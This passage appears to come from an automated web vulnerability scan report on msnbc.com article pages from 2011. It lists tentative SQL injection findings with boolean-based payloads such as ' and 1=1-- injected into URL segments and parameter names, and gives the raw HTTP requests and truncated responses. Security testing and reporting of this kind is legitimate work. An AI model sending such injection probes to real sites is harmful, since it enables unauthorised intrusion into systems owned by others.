The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13122174%20or%201%3d1--%20 and 13122174%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181115


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:485381290 -->
<title>U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" property="og:url" /><meta content="2011-01-30T01:05:41" property="og:updated" /><meta content="U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com" name="title" /><meta content="Obama urges restraint, reform in Egypt" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Barack Obama, Omar Suleiman, Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_viq_wh_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="President Barack Obama issued a plea for restraint in Egypt after meeting with national security aides Saturday to assess the Cairo government's response to widespread protests threatening the stability of the country. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:05:41 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets1d.msnbc.redacted/rendering/msnb
...[SNIP]...

Request 2

GET /id/41327817/ns/world_news-mideastn_africa/?113122174%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" property="og:url" /><meta content="2011-01-30T01:05:41" property="og:updated" /><meta content="U.S. to Egypt: Don't 'stand pat' need 'real reform' - Politics - More politics - msnbc.com" name="title" /><meta content="Obama urges restraint, reform in Egypt" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Barack Obama, Omar Suleiman, Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_viq_wh_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="President Barack Obama issued a plea for restraint in Egypt after meeting with national security aides Saturday to assess the Cairo government's response to widespread protests threatening the stability of the country. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:05:41 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41327817/ns/politics-more_politics/" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets4b.msnbc.redacted/rendering/ms
...[SNIP]...

1.121. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41327924/ns/world_news-europe/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 16798619'%20or%201%3d1--%20 and 16798619'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327924/ns16798619'%20or%201%3d1--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:15:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 181106


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847500 -->
<title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of globa
...[SNIP]...

Request 2

GET /id/41327924/ns16798619'%20or%201%3d2--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 180953


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:935719984 -->
<title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of global
...[SNIP]...

1.122. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41327924/ns/world_news-europe/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 43673560%20or%201%3d1--%20 and 43673560%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:09:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 180628


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:129150930 -->
<title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of global
...[SNIP]...

Request 2

GET /id/41327924/ns/world_news-europe/?143673560%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:09:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 180805


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327924/ns/world_news-europe/" property="og:url" /><meta content="2011-01-29T19:55:35" property="og:updated" /><meta content="Echoes of Egypt swirl around World Economic Forum - World news - Europe - msnbc.com" name="title" /><meta content="Echoes of Egypt swirl around World Economic Forum" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="FRANK JORDANS, MATT MOORE" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Egypt, Hosni Mubarak, Davos, World Economic Forum, World News, Business, Egypt, Switzerland, Germany, France, US, Middle East, Africa, Europe, International agreements, Economy, Cabinets, Government and politics, Legislature, International relations, International Trade, General news, Economic policy, Government business and finance, Government policy, Article, Hosni Mubarak, John Kerry, Ahmed Nazif, Pascal Lamy, Ron Kirk, Angela Merkel, Wolfgang Schaeuble, Christine Lagarde, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="/ap/switzerland%20davos%20forum--1133040334_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia4.redacted/j/ap/switzerland davos forum--1133040334_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Where anti-capitalist protesters failed at the World Economic Forum, the protests in Egypt have become the most-talked about subject at the annual Swiss Alpine retreat of globa
...[SNIP]...

1.123. http://www.msnbc.redacted/id/41328059/ns/us_news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41328059/ns/us_news/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41328059/ns/us_news/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60896


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<img alt="" src="http://msnbcmedia3.redacted/j/ap/us egypt protest chicago-915503310_v2.thumb-s.jpg" width="60" height="45" />
</li>


</ul>

        <h6>

<span class="label">Next story in U.S. news</span>
<a href="http://www.msnbc.redacted/id/41329876/ns/us_news-life/" title="View next story">
U.S. protesters offer support for Egyptians
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41328059/ns/us_news/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41328059/ns/us_news/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-none entry-content ">

<div id="byline" class="txt vcard author contributor"
typeof="v:Person vcard:VCard"
rel="dc:creator"
itemscope itemtype="http://data-vocabulary.org/Person">

<span class="attribution">

By <span class="fn" itemprop="name" prope
...[SNIP]...

Request 2

GET /id/41328059/ns/us_news/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:56:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60915


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<img alt="Image: Egypt's President Hosni Mubarak at the White House in Sept. 2010 with President Obama" src="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/110128-obama-mubarak-2010-1p.thumb-s.jpg" width="60" height="93" />
</li>


</ul>

        <h6>

<span class="label">Next story in U.S. news</span>
<a href="http://www.msnbc.redacted/id/41317259/ns/politics/" title="View next story">
What the United States has at stake in Egypt
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41328059/ns/us_news/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41328059/ns/us_news/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-none entry-content ">

<div id="byline" class="txt vcard author contributor"
typeof="v:Person vcard:VCard"
rel="dc:creator"
itemscope itemtype="http://data-vocabulary.org/Person">


...[SNIP]...

1.124. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41328834/ns/world_news-europe/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41328834/ns'%20and%201%3d1--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 55285


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847508 -->
<title>Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 21:24:54 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T21:24:54" property="og:updated" /><meta content="Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com" name="title" /><meta content="Hungary hit by strongest earthquake since 1985" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Budapest, Hungary, World News, Hungary, Europe, Emergency management, Natural disasters, Government and politics, Accidents and disasters, General news, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Rescue officials say parts of western Hungary and Budapest, the capital city, have been affected by a 4.8 magnitude earthquake, the strongest in the country since 1985." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 21:24:54 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" />
<link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets2a.msnbc.redacted/rendering/msnbc/html40/assets/Css/merge
...[SNIP]...

Request 2

GET /id/41328834/ns'%20and%201%3d2--%20/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:10:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 55239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:1695234872 -->
<title>Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" property="og:url" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" property="og:expires" /><meta content="unavailable_after: Mon, 28 Feb 2011 21:24:54 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T21:24:54" property="og:updated" /><meta content="Hungary hit by strongest earthquake since 1985 - World news - Europe - msnbc.com" name="title" /><meta content="Hungary hit by strongest earthquake since 1985" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Budapest, Hungary, World News, Hungary, Europe, Emergency management, Natural disasters, Government and politics, Accidents and disasters, General news, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Rescue officials say parts of western Hungary and Budapest, the capital city, have been affected by a 4.8 magnitude earthquake, the strongest in the country since 1985." name="description" property="og:description" /><meta content="Mon, 28 Feb 2011 21:24:54 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 21:24:54 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41328834/ns/world_news-europe/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets3d.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged
...[SNIP]...

1.125. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41330515/ns/us_news-life/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

